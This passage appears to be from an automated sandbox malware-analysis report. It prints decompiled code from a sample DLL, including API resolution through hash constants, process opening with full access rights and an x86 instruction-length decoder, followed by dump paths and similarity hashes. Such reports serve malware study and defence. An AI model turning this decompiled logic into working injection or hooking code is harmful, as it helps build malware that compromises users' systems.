									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6F4C3064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6F4BF828(_t449 + 0x40, E6F4BF4CC(_t449 + 0x3c) + 4);
											 *(E6F4BF4BC(_t449 + 0x40, E6F4BF4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6F4BCD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6F4BF4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6F4BF4BC(_t449 + 0x40, _t431 * 4);
												E6F4B8B58( *_t211, E6F4C02B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6F4BCD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6F4BF4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6F4BF4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6F4BF4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6F4BF4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6F4BF4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6F4C38F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6F4BF4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6F4BF828( *(_t449 + 4), E6F4BF4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6F4BF4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6F4BF4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6F4BF4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6F4BF4BC(_t322, _t430);
										E6F4C38F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6F4BF4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6F4BF828(_t322, E6F4BF4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6F4BF828( *(_t449 + 4), E6F4BF4CC( *_t449) + 4);
								 *(E6F4BF4BC( *(_t449 + 4), E6F4BF4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6F4BF828(_t322, E6F4BF4CC(_t322) + 4);
								 *(E6F4BF4BC(_t322, E6F4BF4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6F4BF4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6F4C3064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6F4BF4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6F4BF828( *(_t449 + 4), E6F4BF4CC( *_t449) + 4);
										 *(E6F4BF4BC( *(_t449 + 4), E6F4BF4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6F4BF4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6F4BF828( *((intOrPtr*)(_t449 + 0x74)), E6F4BF4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6F4BF4BC( *((intOrPtr*)(_t449 + 0x74)), E6F4BF4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6F4BF4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6F4BF4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6F4BF4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6F4BF4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6F4BF4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6F4BF4BC(_t430, _t443);
										E6F4C38F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6F4BF4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6F4BF828(_t430, E6F4BF4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6F4C3064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6F4BF4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6F4BF4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6F4BF4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6F4BF4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6F4BF4BC( *(_t449 + 4), _t445);
										E6F4C38F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6F4BF4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6F4BF828( *(_t449 + 4), E6F4BF4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6F4BF4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6f4b8435
0x6f4b843b
0x6f4b843f
0x6f4b8443
0x6f4b844e
0x6f4b8452
0x6f4b8457
0x6f4b845f
0x6f4b846f
0x00000000
0x6f4b8471
0x6f4b8479
0x6f4b8480
0x6f4b8480
0x6f4b89d3
0x6f4b89d5
0x6f4b8a16
0x6f4b8a18
0x6f4b8a27
0x6f4b8a33
0x6f4b8a33
0x6f4b8a22
0x6f4b8a39
0x6f4b8a3e
0x00000000
0x6f4b8a3e
0x6f4b8a26
0x00000000
0x6f4b848a
0x6f4b848e
0x6f4b8491
0x6f4b8599
0x6f4b8599
0x6f4b859e
0x6f4b86c1
0x6f4b86c5
0x6f4b86ca
0x6f4b86ce
0x6f4b86d2
0x6f4b8808
0x6f4b880a
0x6f4b880e
0x6f4b8817
0x6f4b8822
0x6f4b8826
0x6f4b882f
0x6f4b8834
0x6f4b883a
0x6f4b883b
0x6f4b883f
0x6f4b8843
0x6f4b884a
0x6f4b884c
0x6f4b898c
0x6f4b899d
0x6f4b89a4
0x6f4b89ab
0x6f4b89ab
0x6f4b89ae
0x6f4b89b1
0x6f4b89b4
0x6f4b89ba
0x6f4b89c1
0x6f4b89c5
0x6f4b89ce
0x00000000
0x6f4b89ce
0x6f4b89bc
0x6f4b89bf
0x6f4b89d8
0x6f4b89f0
0x6f4b89f3
0x6f4b89f8
0x6f4b8a02
0x6f4b8a05
0x6f4b8a08
0x6f4b8a11
0x00000000
0x6f4b8a11
0x00000000
0x6f4b89bf
0x6f4b8854
0x6f4b8854
0x6f4b8856
0x6f4b885a
0x6f4b885f
0x6f4b8861
0x6f4b8865
0x6f4b8868
0x6f4b8870
0x6f4b8872
0x00000000
0x00000000
0x6f4b8889
0x6f4b88a4
0x6f4b88a6
0x6f4b88b4
0x6f4b88b9
0x6f4b88bb
0x6f4b88d8
0x6f4b88d8
0x6f4b88dc
0x6f4b88de
0x00000000
0x00000000
0x6f4b88e0
0x6f4b88e3
0x6f4b8904
0x6f4b8923
0x6f4b8929
0x6f4b892c
0x6f4b8931
0x6f4b8932
0x6f4b8939
0x00000000
0x00000000
0x6f4b8941
0x6f4b8941
0x6f4b8943
0x6f4b894f
0x6f4b895b
0x6f4b897d
0x6f4b8982
0x6f4b8983
0x6f4b8983
0x00000000
0x6f4b8943
0x00000000
0x6f4b88e3
0x6f4b88bd
0x6f4b88c3
0x6f4b88c5
0x6f4b88c6
0x6f4b88c7
0x6f4b88c8
0x6f4b88cc
0x6f4b88d0
0x6f4b88d2
0x6f4b88d3
0x6f4b88d4
0x6f4b88d6
0x00000000
0x00000000
0x00000000
0x6f4b88d6
0x6f4b88e9
0x00000000
0x6f4b88e9
0x6f4b86d8
0x6f4b86da
0x6f4b86dc
0x00000000
0x00000000
0x6f4b86e6
0x6f4b86e6
0x6f4b86e8
0x6f4b86eb
0x6f4b86ed
0x6f4b86f5
0x6f4b86fc
0x6f4b8700
0x6f4b8703
0x00000000
0x00000000
0x6f4b87ff
0x6f4b8800
0x6f4b8802
0x00000000
0x00000000
0x00000000
0x6f4b8802
0x6f4b8709
0x6f4b870c
0x6f4b8715
0x6f4b871a
0x6f4b871c
0x6f4b8728
0x6f4b872c
0x6f4b8731
0x6f4b8735
0x6f4b8b12
0x6f4b8b26
0x6f4b8b48
0x6f4b8b4d
0x6f4b8b4d
0x6f4b874b
0x6f4b8750
0x6f4b8754
0x6f4b8754
0x6f4b8754
0x6f4b8754
0x6f4b8759
0x6f4b875e
0x6f4b8760
0x6f4b8764
0x6f4b876b
0x6f4b8770
0x6f4b8772
0x6f4b8ad3
0x6f4b8ae2
0x6f4b8afb
0x6f4b8b00
0x6f4b8b00
0x6f4b8785
0x6f4b878a
0x6f4b878e
0x6f4b878e
0x6f4b878e
0x6f4b87a0
0x6f4b87c1
0x6f4b87c9
0x6f4b87d7
0x6f4b87f5
0x6f4b87fb
0x6f4b87fb
0x00000000
0x6f4b870c
0x6f4b85a4
0x6f4b85a4
0x6f4b85a6
0x6f4b85ad
0x6f4b85bb
0x6f4b85bd
0x6f4b85c1
0x6f4b85c3
0x6f4b85c5
0x6f4b8600
0x6f4b860f
0x6f4b8611
0x6f4b8613
0x6f4b8631
0x6f4b8633
0x6f4b8635
0x6f4b8647
0x6f4b8665
0x6f4b866e
0x6f4b8671
0x6f4b867f
0x6f4b8690
0x6f4b86ae
0x6f4b86b0
0x6f4b86b4
0x6f4b86b4
0x6f4b86b4
0x6f4b8635
0x00000000
0x6f4b8613
0x6f4b85cb
0x6f4b85cb
0x6f4b85d0
0x6f4b85d7
0x6f4b85e6
0x6f4b85ed
0x6f4b85ef
0x00000000
0x00000000
0x6f4b85fb
0x6f4b85fc
0x6f4b85fe
0x00000000
0x00000000
0x00000000
0x6f4b85fe
0x6f4b85f1
0x6f4b85f4
0x00000000
0x00000000
0x6f4b86b6
0x6f4b86b6
0x6f4b86b7
0x6f4b86b7
0x00000000
0x6f4b8497
0x6f4b8497
0x6f4b8497
0x6f4b8499
0x6f4b84a0
0x6f4b84ae
0x6f4b84b0
0x6f4b84b4
0x6f4b84b6
0x6f4b84e2
0x6f4b84e6
0x6f4b84eb
0x6f4b84f0
0x6f4b84f4
0x6f4b84f8
0x6f4b84ff
0x6f4b8504
0x6f4b8506
0x6f4b8a95
0x6f4b8aa4
0x6f4b8ac3
0x6f4b8ac8
0x6f4b8ac8
0x6f4b8519
0x6f4b851e
0x6f4b8522
0x6f4b8522
0x6f4b8522
0x6f4b8533
0x6f4b8535
0x6f4b8537
0x6f4b8548
0x6f4b8548
0x6f4b854d
0x6f4b8552
0x6f4b8556
0x6f4b855b
0x6f4b8562
0x6f4b8567
0x6f4b8569
0x6f4b8a57
0x6f4b8a63
0x6f4b8a7d
0x6f4b8a82
0x6f4b8a82
0x6f4b857f
0x6f4b8584
0x6f4b8588
0x6f4b8588
0x6f4b8588
0x6f4b8588
0x6f4b858b
0x6f4b858b
0x00000000
0x6f4b858b
0x6f4b84ba
0x6f4b84ba
0x6f4b84bc
0x6f4b84c8
0x6f4b84cf
0x6f4b84d1
0x00000000
0x00000000
0x6f4b84dd
0x6f4b84de
0x6f4b84e0
0x00000000
0x00000000
0x00000000
0x6f4b84e0
0x6f4b84d3
0x6f4b84d6
0x00000000
0x00000000
0x6f4b858c
0x6f4b8590
0x6f4b8591
0x6f4b8591
0x00000000
0x6f4b8499
0x6f4b8491

Strings

, xrefs: 6F4B8A1A

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e83c4d578512a760747fe0338953edde6ec68eceeb8a9fc5cbb5ea94e80d035d
Instruction ID: 58ba016ecd6a8e82595118477475fac4f67264fca35e6e158c4a9bbfa7e33509
Opcode Fuzzy Hash: e83c4d578512a760747fe0338953edde6ec68eceeb8a9fc5cbb5ea94e80d035d
Instruction Fuzzy Hash: AC125A756093059FC714DF64C980E6FB7E5EF94318F004A2DE599876A3EB30AC46CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F4C9370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6F4C9370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6F4C3698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
